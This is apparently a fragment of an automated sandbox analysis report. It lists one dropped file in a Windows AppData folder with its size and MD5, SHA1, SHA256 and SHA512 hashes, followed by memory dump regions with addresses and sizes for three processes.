C:\Users\Admin\AppData\Roaming\refulge.BodFilesize
442KB
MD5d46f9ca4ea9e4dd43d582b9f2e38199e
SHA109f5c2a00e0f709038145b03889e3ab6263824ed
SHA25694dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e
SHA5127cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b
-
memory/2612-25-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmpFilesize
9.6MB
-
memory/2612-35-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmpFilesize
9.6MB
-
memory/2612-28-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-27-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-26-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-23-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmpFilesize
9.6MB
-
memory/2612-64-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmpFilesize
9.6MB
-
memory/2612-21-0x000000001B750000-0x000000001BA32000-memory.dmpFilesize
2.9MB
-
memory/2612-37-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-36-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-38-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-24-0x0000000002E40000-0x0000000002EC0000-memory.dmpFilesize
512KB
-
memory/2612-22-0x0000000001D80000-0x0000000001D88000-memory.dmpFilesize
32KB
-
memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmpFilesize
16.4MB
-
memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmpFilesize
264KB
-
memory/2884-34-0x0000000006730000-0x0000000007768000-memory.dmpFilesize
16.2MB